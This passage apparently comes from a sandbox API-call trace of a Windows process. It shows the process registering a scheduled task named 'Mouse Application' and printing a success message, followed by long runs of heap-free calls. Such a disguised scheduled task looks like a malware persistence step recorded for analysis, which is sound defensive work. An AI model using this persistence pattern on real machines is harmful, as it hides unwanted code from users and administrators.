_Format="%d-%02d-%02dT%02d:%02d:%02d", _ArgList=0xd2ce28 | out: _Buffer="2020-10-28T13:53:40") returned 19 [0153.599] IRegistrationInfo:put_Date (This=0x32f25f0, Date="2020-10-28T13:53:40") returned 0x0 [0153.599] IUnknown:Release (This=0x32f25f0) returned 0x1 [0153.599] malloc (_Size=0xc) returned 0x32f28a8 [0153.599] free (_Block=0x32f28a8) [0153.599] lstrlenW (lpString="") returned 0 [0153.599] malloc (_Size=0xc) returned 0x32f28a8 [0153.600] ITaskFolder:RegisterTaskDefinition (in: This=0x32f2508, Path="Mouse Application", pDefinition=0x32f2558, flags=6, UserId=0xd2cf48*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), password=0xd2cf58*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), LogonType=3, sddl=0xd2cf6c*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), ppTask=0xd2cfb8 | out: ppTask=0xd2cfb8*=0x32f29b0) returned 0x0 [0155.765] free (_Block=0x32f28a8) [0155.765] _memicmp (_Buf1=0x330fbd0, _Buf2=0xf328b8, _Size=0x7) returned 0 [0155.765] LoadStringW (in: hInstance=0x0, uID=0x12e, lpBuffer=0x330fde0, cchBufferMax=256 | out: lpBuffer="SUCCESS: The scheduled task \"%s\" has successfully been created.\n") returned 0x40 [0155.765] lstrlenW (lpString="SUCCESS: The scheduled task \"%s\" has successfully been created.\n") returned 64 [0155.765] GetProcessHeap () returned 0x3300000 [0155.766] GetProcessHeap () returned 0x3300000 [0155.766] HeapValidate (hHeap=0x3300000, dwFlags=0x0, lpMem=0x330fba0) returned 1 [0155.766] GetProcessHeap () returned 0x3300000 [0155.766] RtlSizeHeap (HeapHandle=0x3300000, Flags=0x0, MemoryPointer=0x330fba0) returned 0xc [0155.766] RtlFreeHeap (HeapHandle=0x3300000, Flags=0x0, BaseAddress=0x330fba0) returned 1 [0155.766] GetProcessHeap () returned 0x3300000 [0155.766] RtlAllocateHeap (HeapHandle=0x3300000, Flags=0xc, Size=0x82) returned 0x331bc40 [0155.766] _vsnwprintf (in: _Buffer=0xd2d408, _BufferCount=0x1fb, _Format="SUCCESS: The scheduled task \"%s\" has successfully been created.\n", _ArgList=0xd2cf7c | out: _Buffer="SUCCESS: The scheduled task \"Mouse Application\" has successfully been created.\n") returned 79 [0155.766] __iob_func () returned 0x776f2608 [0155.766] _fileno (_File=0x776f2628) returned 1 [0155.766] _errno () returned 0x32f05b0 [0155.766] _get_osfhandle (_FileHandle=1) returned 0x90 [0155.766] _errno () returned 0x32f05b0 [0155.766] GetFileType (hFile=0x90) returned 0x2 [0155.766] GetStdHandle (nStdHandle=0xfffffff5) returned 0x90 [0155.766] GetFileType (hFile=0x90) returned 0x2 [0155.766] GetConsoleMode (in: hConsoleHandle=0x90, lpMode=0xd2cf50 | out: lpMode=0xd2cf50) returned 1 [0155.786] __iob_func () returned 0x776f2608 [0155.786] GetStdHandle (nStdHandle=0xfffffff5) returned 0x90 [0155.786] lstrlenW (lpString="SUCCESS: The scheduled task \"Mouse Application\" has successfully been created.\n") returned 79 [0155.786] WriteConsoleW (in: hConsoleOutput=0x90, lpBuffer=0xd2d408*, nNumberOfCharsToWrite=0x4f, lpNumberOfCharsWritten=0xd2cf74, lpReserved=0x0 | out: lpBuffer=0xd2d408*, lpNumberOfCharsWritten=0xd2cf74*=0x4f) returned 1 [0155.792] IUnknown:Release (This=0x32f29b0) returned 0x0 [0155.792] TaskScheduler:IUnknown:Release (This=0x32f2558) returned 0x0 [0155.792] TaskScheduler:IUnknown:Release (This=0x32f2508) returned 0x0 [0155.792] TaskScheduler:IUnknown:Release (This=0x32f2430) returned 0x0 [0155.792] lstrlenW (lpString="") returned 0 [0155.792] lstrlenW (lpString="1") returned 1 [0155.792] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="1", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 2 [0155.792] GetProcessHeap () returned 0x3300000 [0155.792] GetProcessHeap () returned 0x3300000 [0155.792] HeapValidate (hHeap=0x3300000, dwFlags=0x0, lpMem=0x330f138) returned 1 [0155.792] GetProcessHeap () returned 0x3300000 [0155.792] RtlSizeHeap (HeapHandle=0x3300000, Flags=0x0, MemoryPointer=0x330f138) returned 0x1fc [0155.793] RtlFreeHeap (HeapHandle=0x3300000, Flags=0x0, BaseAddress=0x330f138) returned 1 [0155.793] GetProcessHeap () returned 0x3300000 [0155.793] GetProcessHeap () returned 0x3300000 [0155.793] HeapValidate (hHeap=0x3300000, dwFlags=0x0, lpMem=0x330f340) returned 1 [0155.793] GetProcessHeap () returned 0x3300000 [0155.793] RtlSizeHeap (HeapHandle=0x3300000, Flags=0x0, MemoryPointer=0x330f340) returned 0x1fc [0155.793] RtlFreeHeap (HeapHandle=0x3300000, Flags=0x0, BaseAddress=0x330f340) returned 1 [0155.793] GetProcessHeap () returned 0x3300000 [0155.793] GetProcessHeap () returned 0x3300000 [0155.793] HeapValidate (hHeap=0x3300000, dwFlags=0x0, lpMem=0x330d1f0) returned 1 [0155.793] GetProcessHeap () returned 0x3300000 [0155.793] RtlSizeHeap (HeapHandle=0x3300000, Flags=0x0, MemoryPointer=0x330d1f0) returned 0x16 [0155.793] RtlFreeHeap (HeapHandle=0x3300000, Flags=0x0, BaseAddress=0x330d1f0) returned 1 [0155.793] GetProcessHeap () returned 0x3300000 [0155.793] GetProcessHeap () returned 0x3300000 [0155.793] HeapValidate (hHeap=0x3300000, dwFlags=0x0, lpMem=0x330fab0) returned 1 [0155.793] GetProcessHeap () returned 0x3300000 [0155.793] RtlSizeHeap (HeapHandle=0x3300000, Flags=0x0, MemoryPointer=0x330fab0) returned 0x10 [0155.793] RtlFreeHeap (HeapHandle=0x3300000, Flags=0x0, BaseAddress=0x330fab0) returned 1 [0155.793] GetProcessHeap () returned 0x3300000 [0155.793] GetProcessHeap () returned 0x3300000 [0155.793] HeapValidate (hHeap=0x3300000, dwFlags=0x0, lpMem=0x330d1d0) returned 1 [0155.793] GetProcessHeap () returned 0x3300000 [0155.793] RtlSizeHeap (HeapHandle=0x3300000, Flags=0x0, MemoryPointer=0x330d1d0) returned 0x14 [0155.793] RtlFreeHeap (HeapHandle=0x3300000, Flags=0x0, BaseAddress=0x330d1d0) returned 1 [0155.793] GetProcessHeap () returned 0x3300000 [0155.793] GetProcessHeap () returned 0x3300000 [0155.793] HeapValidate (hHeap=0x3300000, dwFlags=0x0, lpMem=0x33004a0) returned 1 [0155.793] GetProcessHeap () returned 0x3300000 [0155.793] RtlSizeHeap (HeapHandle=0x3300000, Flags=0x0, MemoryPointer=0x33004a0) returned 0xa0 [0155.793] RtlFreeHeap (HeapHandle=0x3300000, Flags=0x0, BaseAddress=0x33004a0) returned 1 [0155.794] GetProcessHeap () returned 0x3300000 [0155.794] GetProcessHeap () returned 0x3300000 [0155.794] HeapValidate (hHeap=0x3300000, dwFlags=0x0, lpMem=0x3307cd8) returned 1 [0155.794] GetProcessHeap () returned 0x3300000 [0155.794] RtlSizeHeap (HeapHandle=0x3300000, Flags=0x0, MemoryPointer=0x3307cd8) returned 0x10 [0155.794] RtlFreeHeap (HeapHandle=0x3300000, Flags=0x0, BaseAddress=0x3307cd8) returned 1 [0155.794] GetProcessHeap () returned 0x3300000 [0155.794] GetProcessHeap () returned 0x3300000 [0155.794] HeapValidate (hHeap=0x3300000, dwFlags=0x0, lpMem=0x330d110) returned 1 [0155.794] GetProcessHeap () returned 0x3300000 [0155.794] RtlSizeHeap (HeapHandle=0x3300000, Flags=0x0, MemoryPointer=0x330d110) returned 0x14 [0155.794] RtlFreeHeap (HeapHandle=0x3300000, Flags=0x0, BaseAddress=0x330d110) returned 1 [0155.794] GetProcessHeap () returned 0x3300000 [0155.794] GetProcessHeap () returned 0x3300000 [0155.794] HeapValidate (hHeap=0x3300000, dwFlags=0x0, lpMem=0x3304208) returned 1 [0155.794] GetProcessHeap () returned 0x3300000 [0155.794] RtlSizeHeap (HeapHandle=0x3300000, Flags=0x0, MemoryPointer=0x3304208) returned 0x46 [0155.794] RtlFreeHeap (HeapHandle=0x3300000, Flags=0x0, BaseAddress=0x3304208) returned 1 [0155.794] GetProcessHeap () returned 0x3300000 [0155.794] GetProcessHeap () returned 0x3300000 [0155.794] HeapValidate (hHeap=0x3300000, dwFlags=0x0, lpMem=0x330fc30) returned 1 [0155.794] GetProcessHeap () returned 0x3300000 [0155.794] RtlSizeHeap (HeapHandle=0x3300000, Flags=0x0, MemoryPointer=0x330fc30) returned 0x10 [0155.794] RtlFreeHeap (HeapHandle=0x3300000, Flags=0x0, BaseAddress=0x330fc30) returned 1 [0155.794] GetProcessHeap () returned 0x3300000 [0155.794] GetProcessHeap () returned 0x3300000 [0155.794] HeapValidate (hHeap=0x3300000, dwFlags=0x0, lpMem=0x330cf70) returned 1 [0155.794] GetProcessHeap () returned 0x3300000 [0155.794] RtlSizeHeap (HeapHandle=0x3300000, Flags=0x0, MemoryPointer=0x330cf70) returned 0x14 [0155.794] RtlFreeHeap (HeapHandle=0x3300000, Flags=0x0, BaseAddress=0x330cf70) returned 1 [0155.794] GetProcessHeap () returned 0x3300000 [0155.794] GetProcessHeap () returned 0x3300000 [0155.794] HeapValidate (hHeap=0x3300000, dwFlags=0x0, lpMem=0x3304498) returned 1 [0155.795] GetProcessHeap () returned 0x3300000 [0155.795] RtlSizeHeap (HeapHandle=0x3300000, Flags=0x0, MemoryPointer=0x3304498) returned 0x4a [0155.795] RtlFreeHeap (HeapHandle=0x3300000, Flags=0x0, BaseAddress=0x3304498) returned 1 [0155.795] GetProcessHeap () returned 0x3300000 [0155.795] GetProcessHeap () returned 0x3300000 [0155.795] HeapValidate (hHeap=0x3300000, dwFlags=0x0, lpMem=0x330fa20) returned 1 [0155.795] GetProcessHeap () returned 0x3300000 [0155.795] RtlSizeHeap (HeapHandle=0x3300000, Flags=0x0, MemoryPointer=0x330fa20) returned 0x10 [0155.795] RtlFreeHeap (HeapHandle=0x3300000, Flags=0x0, BaseAddress=0x330fa20) returned 1 [0155.795] GetProcessHeap () returned 0x3300000 [0155.795] GetProcessHeap () returned 0x3300000 [0155.795] HeapValidate (hHeap=0x3300000, dwFlags=0x0, lpMem=0x330cf50) returned 1 [0155.795] GetProcessHeap () returned 0x3300000 [0155.795] RtlSizeHeap (HeapHandle=0x3300000, Flags=0x0, MemoryPointer=0x330cf50) returned 0x14 [0155.795] RtlFreeHeap (HeapHandle=0x3300000, Flags=0x0, BaseAddress=0x330cf50) returned 1 [0155.795] GetProcessHeap () returned 0x3300000 [0155.795] GetProcessHeap () returned 0x3300000 [0155.795] HeapValidate (hHeap=0x3300000, dwFlags=0x0, lpMem=0x330fb70) returned 1 [0155.795] GetProcessHeap () returned 0x3300000 [0155.795] RtlSizeHeap (HeapHandle=0x3300000, Flags=0x0, MemoryPointer=0x330fb70) returned 0xc [0155.795] RtlFreeHeap (HeapHandle=0x3300000, Flags=0x0, BaseAddress=0x330fb70) returned 1 [0155.795] GetProcessHeap () returned 0x3300000 [0155.795] GetProcessHeap () returned 0x3300000 [0155.795] HeapValidate (hHeap=0x3300000, dwFlags=0x0, lpMem=0x330fcd8) returned 1 [0155.795] GetProcessHeap () returned 0x3300000 [0155.795] RtlSizeHeap (HeapHandle=0x3300000, Flags=0x0, MemoryPointer=0x330fcd8) returned 0x10 [0155.795] RtlFreeHeap (HeapHandle=0x3300000, Flags=0x0, BaseAddress=0x330fcd8) returned 1 [0155.795] GetProcessHeap () returned 0x3300000 [0155.795] GetProcessHeap () returned 0x3300000 [0155.795] HeapValidate (hHeap=0x3300000, dwFlags=0x0, lpMem=0x330cf30) returned 1 [0155.795] GetProcessHeap () returned 0x3300000 [0155.795] RtlSizeHeap (HeapHandle=0x3300000, Flags=0x0, MemoryPointer=0x330cf30) returned 0x14 [0155.795] RtlFreeHeap (HeapHandle=0x3300000, Flags=0x0, BaseAddress=0x330cf30) returned 1 [0155.795] GetProcessHeap () returned 0x3300000 [0155.796] GetProcessHeap () returned 0x3300000 [0155.796] HeapValidate (hHeap=0x3300000, dwFlags=0x0, lpMem=0x330d230) returned 1 [0155.796] GetProcessHeap () returned 0x3300000 [0155.796] RtlSizeHeap (HeapHandle=0x3300000, Flags=0x0, MemoryPointer=0x330d230) returned 0x208 [0155.796] RtlFreeHeap (HeapHandle=0x3300000, Flags=0x0, BaseAddress=0x330d230) returned 1 [0155.796] GetProcessHeap () returned 0x3300000 [0155.796] GetProcessHeap () returned 0x3300000 [0155.796] HeapValidate (hHeap=0x3300000, dwFlags=0x0, lpMem=0x3307de0) returned 1 [0155.796] GetProcessHeap () returned 0x3300000 [0155.796] RtlSizeHeap (HeapHandle=0x3300000, Flags=0x0, MemoryPointer=0x3307de0) returned 0x10 [0155.796] RtlFreeHeap (HeapHandle=0x3300000, Flags=0x0, BaseAddress=0x3307de0) returned 1 [0155.796] GetProcessHeap () returned 0x3300000 [0155.796] GetProcessHeap () returned 0x3300000 [0155.796] HeapValidate (hHeap=0x3300000, dwFlags=0x0, lpMem=0x330cef0) returned 1 [0155.796] GetProcessHeap () returned 0x3300000 [0155.796] RtlSizeHeap (HeapHandle=0x3300000, Flags=0x0, MemoryPointer=0x330cef0) returned 0x14 [0155.796] RtlFreeHeap (HeapHandle=0x3300000, Flags=0x0, BaseAddress=0x330cef0) returned 1 [0155.796] GetProcessHeap () returned 0x3300000 [0155.796] GetProcessHeap () returned 0x3300000 [0155.796] HeapValidate (hHeap=0x3300000, dwFlags=0x0, lpMem=0x330fde0) returned 1 [0155.796] GetProcessHeap () returned 0x3300000 [0155.796] RtlSizeHeap (HeapHandle=0x3300000, Flags=0x0, MemoryPointer=0x330fde0) returned 0x200 [0155.796] RtlFreeHeap (HeapHandle=0x3300000, Flags=0x0, BaseAddress=0x330fde0) returned 1 [0155.796] GetProcessHeap () returned 0x3300000 [0155.796] GetProcessHeap () returned 0x3300000 [0155.796] HeapValidate (hHeap=0x3300000, dwFlags=0x0, lpMem=0x330fbd0) returned 1 [0155.796] GetProcessHeap () returned 0x3300000 [0155.796] RtlSizeHeap (HeapHandle=0x3300000, Flags=0x0, MemoryPointer=0x330fbd0) returned 0x10 [0155.796] RtlFreeHeap (HeapHandle=0x3300000, Flags=0x0, BaseAddress=0x330fbd0) returned 1 [0155.796] GetProcessHeap () returned 0x3300000 [0155.796] GetProcessHeap () returned 0x3300000 [0155.797] HeapValidate (hHeap=0x3300000, dwFlags=0x0, lpMem=0x330d0d0) returned 1 [0155.797] GetProcessHeap () returned 0x3300000 [0155.797] RtlSizeHeap (HeapHandle=0x3300000, Flags=0x0, MemoryPointer=0x330d0d0) returned 0x14 [0155.797] RtlFreeHeap (HeapHandle=0x3300000, Flags=0x0, BaseAddress=0x330d0d0) returned 1 [0155.797] GetProcessHeap () returned 0x3300000 [0155.797] GetProcessHeap () returned 0x3300000 [0155.797] HeapValidate (hHeap=0x3300000, dwFlags=0x0, lpMem=0x330d1b0) returned 1 [0155.797] GetProcessHeap () returned 0x3300000 [0155.797] RtlSizeHeap (HeapHandle=0x3300000, Flags=0x0, MemoryPointer=0x330d1b0) returned 0x14 [0155.797] RtlFreeHeap (HeapHandle=0x3300000, Flags=0x0, BaseAddress=0x330d1b0) returned 1 [0155.797] GetProcessHeap () returned 0x3300000 [0155.797] GetProcessHeap () returned 0x3300000 [0155.797] HeapValidate (hHeap=0x3300000, dwFlags=0x0, lpMem=0x330fbe8) returned 1 [0155.797] GetProcessHeap () returned 0x3300000 [0155.797] RtlSizeHeap (HeapHandle=0x3300000, Flags=0x0, MemoryPointer=0x330fbe8) returned 0x10 [0155.797] RtlFreeHeap (HeapHandle=0x3300000, Flags=0x0, BaseAddress=0x330fbe8) returned 1 [0155.797] GetProcessHeap () returned 0x3300000 [0155.797] GetProcessHeap () returned 0x3300000 [0155.797] HeapValidate (hHeap=0x3300000, dwFlags=0x0, lpMem=0x330cfb0) returned 1 [0155.797] GetProcessHeap () returned 0x3300000 [0155.797] RtlSizeHeap (HeapHandle=0x3300000, Flags=0x0, MemoryPointer=0x330cfb0) returned 0x14 [0155.797] RtlFreeHeap (HeapHandle=0x3300000, Flags=0x0, BaseAddress=0x330cfb0) returned 1 [0155.797] GetProcessHeap () returned 0x3300000 [0155.797] GetProcessHeap () returned 0x3300000 [0155.797] HeapValidate (hHeap=0x3300000, dwFlags=0x0, lpMem=0x330d150) returned 1 [0155.797] GetProcessHeap () returned 0x3300000 [0155.797] RtlSizeHeap (HeapHandle=0x3300000, Flags=0x0, MemoryPointer=0x330d150) returned 0x16 [0155.797] RtlFreeHeap (HeapHandle=0x3300000, Flags=0x0, BaseAddress=0x330d150) returned 1 [0155.797] GetProcessHeap () returned 0x3300000 [0155.797] GetProcessHeap () returned 0x3300000 [0155.797] HeapValidate (hHeap=0x3300000, dwFlags=0x0, lpMem=0x330fac8) returned 1 [0155.797] GetProcessHeap () returned 0x3300000 [0155.797] RtlSizeHeap (HeapHandle=0x3300000, Flags=0x0, MemoryPointer=0x330fac8) returned 0x10 [0155.797] RtlFreeHeap (HeapHandle=0x3300000, Flags=0x0, BaseAddress=0x330fac8) returned 1 [0155.798] GetProcessHeap () returned 0x3300000 [0155.798] GetProcessHeap () returned 0x3300000 [0155.798] HeapValidate (hHeap=0x3300000, dwFlags=0x0, lpMem=0x330d070) returned 1 [0155.798] GetProcessHeap () returned 0x3300000 [0155.798] RtlSizeHeap (HeapHandle=0x3300000, Flags=0x0, MemoryPointer=0x330d070) returned 0x14 [0155.798] RtlFreeHeap (HeapHandle=0x3300000, Flags=0x0, BaseAddress=0x330d070) returned 1 [0155.798] GetProcessHeap () returned 0x3300000 [0155.798] GetProcessHeap () returned 0x3300000 [0155.798] HeapValidate (hHeap=0x3300000, dwFlags=0x0, lpMem=0x330bb28) returned 1 [0155.798] GetProcessHeap () returned 0x3300000 [0155.798] RtlSizeHeap (HeapHandle=0x3300000, Flags=0x0, MemoryPointer=0x330bb28) returned 0x2 [0155.798] RtlFreeHeap (HeapHandle=0x3300000, Flags=0x0, BaseAddress=0x330bb28) returned 1 [0155.798] GetProcessHeap () returned 0x3300000 [0155.798] GetProcessHeap () returned 0x3300000 [0155.798] HeapValidate (hHeap=0x3300000, dwFlags=0x0, lpMem=0x3304ad0) returned 1 [0155.798] GetProcessHeap () returned 0x3300000 [0155.798] RtlSizeHeap (HeapHandle=0x3300000, Flags=0x0, MemoryPointer=0x3304ad0) returned 0x14 [0155.798] RtlFreeHeap (HeapHandle=0x3300000, Flags=0x0, BaseAddress=0x3304ad0) returned 1 [0155.798] GetProcessHeap () returned 0x3300000 [0155.798] GetProcessHeap () returned 0x3300000 [0155.798] HeapValidate (hHeap=0x3300000, dwFlags=0x0, lpMem=0x3304ce8) returned 1 [0155.798] GetProcessHeap () returned 0x3300000 [0155.798] RtlSizeHeap (HeapHandle=0x3300000, Flags=0x0, MemoryPointer=0x3304ce8) returned 0x14 [0155.798] RtlFreeHeap (HeapHandle=0x3300000, Flags=0x0, BaseAddress=0x3304ce8) returned 1 [0155.798] GetProcessHeap () returned 0x3300000 [0155.798] GetProcessHeap () returned 0x3300000 [0155.798] HeapValidate (hHeap=0x3300000, dwFlags=0x0, lpMem=0x3308350) returned 1 [0155.798] GetProcessHeap () returned 0x3300000 [0155.798] RtlSizeHeap (HeapHandle=0x3300000, Flags=0x0, MemoryPointer=0x3308350) returned 0x14 [0155.799] RtlFreeHeap (HeapHandle=0x3300000, Flags=0x0, BaseAddress=0x3308350) returned 1 [0155.799] GetProcessHeap () returned 0x3300000 [0155.799] GetProcessHeap () returned 0x3300000 [0155.799] HeapValidate (hHeap=0x3300000, dwFlags=0x0, lpMem=0x330cfd0) returned 1 [0155.799] GetProcessHeap () returned 0x3300000 [0155.799] RtlSizeHeap (HeapHandle=0x3300000, Flags=0x0, MemoryPointer=0x330cfd0) returned 0x14 [0155.799] RtlFreeHeap (HeapHandle=0x3300000, Flags=0x0, BaseAddress=0x330cfd0) returned 1 [0155.799] GetProcessHeap () returned 0x3300000 [0155.799] GetProcessHeap () returned 0x3300000 [0155.799] HeapValidate (hHeap=0x3300000, dwFlags=0x0, lpMem=0x330d130) returned 1 [0155.799] GetProcessHeap () returned 0x3300000 [0155.799] RtlSizeHeap (HeapHandle=0x3300000, Flags=0x0, MemoryPointer=0x330d130) returned 0x14 [0155.799] RtlFreeHeap (HeapHandle=0x3300000, Flags=0x0, BaseAddress=0x330d130) returned 1 [0155.799] GetProcessHeap () returned 0x3300000 [0155.799] GetProcessHeap () returned 0x3300000 [0155.799] HeapValidate (hHeap=0x3300000, dwFlags=0x0, lpMem=0x330fb28) returned 1 [0155.799] GetProcessHeap () returned 0x3300000 [0155.799] RtlSizeHeap (HeapHandle=0x3300000, Flags=0x0, MemoryPointer=0x330fb28) returned 0xe [0155.799] RtlFreeHeap (HeapHandle=0x3300000, Flags=0x0, BaseAddress=0x330fb28) returned 1 [0155.799] GetProcessHeap () returned 0x3300000 [0155.799] GetProcessHeap () returned 0x3300000 [0155.799] HeapValidate (hHeap=0x3300000, dwFlags=0x0, lpMem=0x330d190) returned 1 [0155.799] GetProcessHeap () returned 0x3300000 [0155.799] RtlSizeHeap (HeapHandle=0x3300000, Flags=0x0, MemoryPointer=0x330d190) returned 0x14 [0155.799] RtlFreeHeap (HeapHandle=0x3300000, Flags=0x0, BaseAddress=0x330d190) returned 1 [0155.799] GetProcessHeap () returned 0x3300000 [0155.799] GetProcessHeap () returned 0x3300000 [0155.799] HeapValidate (hHeap=0x3300000, dwFlags=0x0, lpMem=0x3304960) returned 1 [0155.799] GetProcessHeap () returned 0x3300000 [0155.800] RtlSizeHeap (HeapHandle=0x3300000, Flags=0x0, MemoryPointer=0x3304960) returned 0x30 [0155.800] RtlFreeHeap (HeapHandle=0x3300000, Flags=0x0, BaseAddress=0x3304960) returned 1 [0155.800] GetProcessHeap () returned 0x3300000 [0155.800] GetProcessHeap () returned 0x3300000 [0155.800] HeapValidate (hHeap=0x3300000, dwFlags=0x0, lpMem=0x330cff0) returned 1 [0155.800] GetProcessHeap () returned 0x3300000 [0155.800] RtlSizeHeap (HeapHandle=0x3300000, Flags=0x0, MemoryPointer=0x330cff0) returned 0x14 [0155.800] RtlFreeHeap (HeapHandle=0x3300000, Flags=0x0, BaseAddress=0x330cff0) returned 1 [0155.800] GetProcessHeap () returned 0x3300000 [0155.800] GetProcessHeap () returned 0x3300000 [0155.800] HeapValidate (hHeap=0x3300000, dwFlags=0x0, lpMem=0x33046d8) returned 1 [0155.800] GetProcessHeap () returned 0x3300000 [0155.800] RtlSizeHeap (HeapHandle=0x3300000, Flags=0x0, MemoryPointer=0x33046d8) returned 0x30 [0155.800] RtlFreeHeap (HeapHandle=0x3300000, Flags=0x0, BaseAddress=0x33046d8) returned 1 [0155.800] GetProcessHeap () returned 0x3300000 [0155.800] GetProcessHeap () returned 0x3300000 [0155.800] HeapValidate (hHeap=0x3300000, dwFlags=0x0, lpMem=0x330d210) returned 1 [0155.800] GetProcessHeap () returned 0x3300000 [0155.800] RtlSizeHeap (HeapHandle=0x3300000, Flags=0x0, MemoryPointer=0x330d210) returned 0x14 [0155.800] RtlFreeHeap (HeapHandle=0x3300000, Flags=0x0, BaseAddress=0x330d210) returned 1 [0155.800] GetProcessHeap () returned 0x3300000 [0155.800] GetProcessHeap () returned 0x3300000 [0155.800] HeapValidate (hHeap=0x3300000, dwFlags=0x0, lpMem=0x330fc90) returned 1 [0155.800] GetProcessHeap () returned 0x3300000 [0155.800] RtlSizeHeap (HeapHandle=0x3300000, Flags=0x0, MemoryPointer=0x330fc90) returned 0xe [0155.800] RtlFreeHeap (HeapHandle=0x3300000, Flags=0x0, BaseAddress=0x330fc90) returned 1 [0155.800] GetProcessHeap () returned 0x3300000 [0155.800] GetProcessHeap () returned 0x3300000 [0155.800] HeapValidate (hHeap=0x3300000, dwFlags=0x0, lpMem=0x330d010) returned 1 [0155.801] GetProcessHeap () returned 0x3300000 [0155.801] RtlSizeHeap (HeapHandle=0x3300000, Flags=0x0, MemoryPointer=0x330d010) returned 0x14 [0155.801] RtlFreeHeap (HeapHandle=0x3300000, Flags=0x0, BaseAddress=0x330d010) returned 1 [0155.801] GetProcessHeap () returned 0x3300000 [0155.801] GetProcessHeap () returned 0x3300000 [0155.801] HeapValidate (hHeap=0x3300000, dwFlags=0x0, lpMem=0x3310118) returned 1 [0155.801] GetProcessHeap () returned 0x3300000 [0155.801] RtlSizeHeap (HeapHandle=0x3300000, Flags=0x0, MemoryPointer=0x3310118) returned 0x16 [0155.801] RtlFreeHeap (HeapHandle=0x3300000, Flags=0x0, BaseAddress=0x3310118) returned 1 [0155.801] GetProcessHeap () returned 0x3300000 [0155.801] GetProcessHeap () returned 0x3300000 [0155.801] HeapValidate (hHeap=0x3300000, dwFlags=0x0, lpMem=0x33102d8) returned 1 [0155.801] GetProcessHeap () returned 0x3300000 [0155.801] RtlSizeHeap (HeapHandle=0x3300000, Flags=0x0, MemoryPointer=0x33102d8) returned 0x14 [0155.801] RtlFreeHeap (HeapHandle=0x3300000, Flags=0x0, BaseAddress=0x33102d8) returned 1 [0155.801] GetProcessHeap () returned 0x3300000 [0155.801] GetProcessHeap () returned 0x3300000 [0155.801] HeapValidate (hHeap=0x3300000, dwFlags=0x0, lpMem=0x33102b8) returned 1 [0155.801] GetProcessHeap () returned 0x3300000 [0155.801] RtlSizeHeap (HeapHandle=0x3300000, Flags=0x0, MemoryPointer=0x33102b8) returned 0x16 [0155.801] RtlFreeHeap (HeapHandle=0x3300000, Flags=0x0, BaseAddress=0x33102b8) returned 1 [0155.801] GetProcessHeap () returned 0x3300000 [0155.801] GetProcessHeap () returned 0x3300000 [0155.801] HeapValidate (hHeap=0x3300000, dwFlags=0x0, lpMem=0x33100d8) returned 1 [0155.801] GetProcessHeap () returned 0x3300000 [0155.801] RtlSizeHeap (HeapHandle=0x3300000, Flags=0x0, MemoryPointer=0x33100d8) returned 0x14 [0155.801] RtlFreeHeap (HeapHandle=0x3300000, Flags=0x0, BaseAddress=0x33100d8) returned 1 [0155.801] GetProcessHeap () returned 0x3300000 [0155.801] GetProcessHeap () returned 0x3300000 [0155.801] HeapValidate (hHeap=0x3300000, dwFlags=0x0, lpMem=0x331bc40) returned 1 [0155.801] GetProcessHeap () returned 0x3300000 [0155.801] RtlSizeHeap (HeapHandle=0x3300000, Flags=0x0, MemoryPointer=0x331bc40) returned 0x82 [0155.801] RtlFreeHeap (HeapHandle=0x3300000, Flags=0x0, BaseAddress=0x331bc40) returned 1 [0155.801] GetProcessHeap () returned 0x3300000 [0155.801] GetProcessHeap () returned 0x3300000 [0155.802] HeapValidate (hHeap=0x3300000, dwFlags=0x0, lpMem=0x33100b8) returned 1 [0155.802] GetProcessHeap () returned 0x3300000 [0155.802] RtlSizeHeap (HeapHandle=0x3300000, Flags=0x0, MemoryPointer=0x33100b8) returned 0x14 [0155.802] RtlFreeHeap (HeapHandle=0x3300000, Flags=0x0, BaseAddress=0x33100b8) returned 1 [0155.802] GetProcessHeap () returned 0x3300000 [0155.802] GetProcessHeap () returned 0x3300000 [0155.802] HeapValidate (hHeap=0x3300000, dwFlags=0x0, lpMem=0x330fc48) returned 1 [0155.802] GetProcessHeap () returned 0x3300000 [0155.802] RtlSizeHeap (HeapHandle=0x3300000, Flags=0x0, MemoryPointer=0x330fc48) returned 0xe [0155.802] RtlFreeHeap (HeapHandle=0x3300000, Flags=0x0, BaseAddress=0x330fc48) returned 1 [0155.802] GetProcessHeap () returned 0x3300000 [0155.802] GetProcessHeap () returned 0x3300000 [0155.802] HeapValidate (hHeap=0x3300000, dwFlags=0x0, lpMem=0x3310218) returned 1 [0155.802] GetProcessHeap () returned 0x3300000 [0155.802] RtlSizeHeap (HeapHandle=0x3300000, Flags=0x0, MemoryPointer=0x3310218) returned 0x14 [0155.802] RtlFreeHeap (HeapHandle=0x3300000, Flags=0x0, BaseAddress=0x3310218) returned 1 [0155.802] GetProcessHeap () returned 0x3300000 [0155.802] GetProcessHeap () returned 0x3300000 [0155.802] HeapValidate (hHeap=0x3300000, dwFlags=0x0, lpMem=0x330fa50) returned 1 [0155.802] GetProcessHeap () returned 0x3300000 [0155.802] RtlSizeHeap (HeapHandle=0x3300000, Flags=0x0, MemoryPointer=0x330fa50) returned 0xa [0155.802] RtlFreeHeap (HeapHandle=0x3300000, Flags=0x0, BaseAddress=0x330fa50) returned 1 [0155.802] GetProcessHeap () returned 0x3300000 [0155.802] GetProcessHeap () returned 0x3300000 [0155.802] HeapValidate (hHeap=0x3300000, dwFlags=0x0, lpMem=0x3310298) returned 1 [0155.802] GetProcessHeap () returned 0x3300000 [0155.802] RtlSizeHeap (HeapHandle=0x3300000, Flags=0x0, MemoryPointer=0x3310298) returned 0x14 [0155.802] RtlFreeHeap (HeapHandle=0x3300000, Flags=0x0, BaseAddress=0x3310298) returned 1 [0155.802] GetProcessHeap () returned 0x3300000 [0155.802] GetProcessHeap () returned 0x3300000 [0155.802] HeapValidate (hHeap=0x3300000, dwFlags=0x0, lpMem=0x330fc00) returned 1 [0155.802] GetProcessHeap () returned 0x3300000 [0155.802] RtlSizeHeap (HeapHandle=0x3300000, Flags=0x0, MemoryPointer=0x330fc00) returned 0xc [0155.802] RtlFreeHeap (HeapHandle=0x3300000, Flags=0x0, BaseAddress=0x330fc00) returned 1 [0155.803] GetProcessHeap () returned 0x3300000 